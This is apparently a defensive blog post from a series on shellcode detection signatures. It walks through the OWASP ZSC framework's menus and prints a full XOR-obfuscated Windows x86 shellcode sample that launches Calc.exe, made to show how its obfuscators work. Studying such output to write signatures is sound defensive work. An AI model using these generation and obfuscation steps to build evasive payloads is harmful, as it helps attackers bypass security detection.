In this installment of our Shellcode Signatures Series, we discuss the OWASP ZSC Framework. While this project is not as robust as a larger framework like Metasploit, it does supply payloads and obfuscators that are worth understanding from a defensive standpoint.
The OWASP ZSC Framework is capable of producing several different types of built-in payloads and has support for downloading shellcode samples from shell_storm. The tool also contains basic obfuscators that can modify payloads to aid in bypassing detection.
In our earlier blog posts, we discussed different methods of obtaining the instruction pointer (GetPC). When writing signatures on shellcode, the primary idea is to write a few signatures that can successfully trigger on properties of shellcode without having to specify every discovered variant.
There are several obfuscators and payloads supported within ZSC. For the sake of brevity, we will only break down a couple methods the tool uses in this blog post.
Generating Shellcode and XOR Obfuscation
Generating shellcode within ZSC is a simple process: Typing through the menus allows the user to select the architecture, operating system, payload, and finally, the obfuscation technique they would like to apply.
A simple session would resemble the following:
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> windows_x86
zsc/shellcode/generate/windows_x86> exec
zsc/shellcode/generate/windows_x86/exec> file_to_execute
file_to_execute> C:\Windows\System32\Calc.exe
[+] file_to_execute set to "C:\Windows\System32\Calc.exe"
[+] none
[+] xor_random
[+] add_random
[+] sub_random
[+] xor_yourvalue
[+] inc
[+] dec
[+] inc_timesyouwant
[+] dec_timesyouwant
[+] add_yourvalue
[+] sub_yourvalue
[+] enter encode type
zsc/shellcode/generate/windows_x86/exec/encode_type> xor_random
Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x30\x55\x6a\x59\x5b\x68\x67\x3c\x04\x1c\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x53\x68\x43\x58\x75\x47\x5b\x68\x6d\x3d\x0d\x22\x59\x31\xd9\x5b\x51\x53\x68\x51\x6d\x71\x4d\x5b\x68\x12\x0c\x1d\x2e\x59\x31\xd9\x5b\x51\x53\x68\x33\x50\x6e\x39\x5b\x68\x5e\x63\x5c\x65\x59\x31\xd9\x5b\x51\x53\x68\x6c\x4b\x38\x70\x5b\x68\x15\x38\x4c\x15\x59\x31\xd9\x5b\x51\x53\x68\x45\x75\x4d\x4c\x5b\x68\x32\x06\x11\x1f\x59\x31\xd9\x5b\x51\x53\x68\x78\x5a\x6c\x32\x5b\x68\x11\x34\x08\x5d\x59\x31\xd9\x5b\x51\x53\x68\x48\x70\x6b\x6e\x5b\x68\x0b\x4a\x37\x39\x59\x31\xd9\x5b\x51\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x24\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x53\x68\x42\x44\x4e\x56\x5b\x68\x12\x36\x21\x35\x59\x31\xd9\x5b\x51\x53\x68\x53\x61\x72\x57\x5b\x68\x16\x19\x1b\x23\x59\x31\xd9\x5b\x51\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0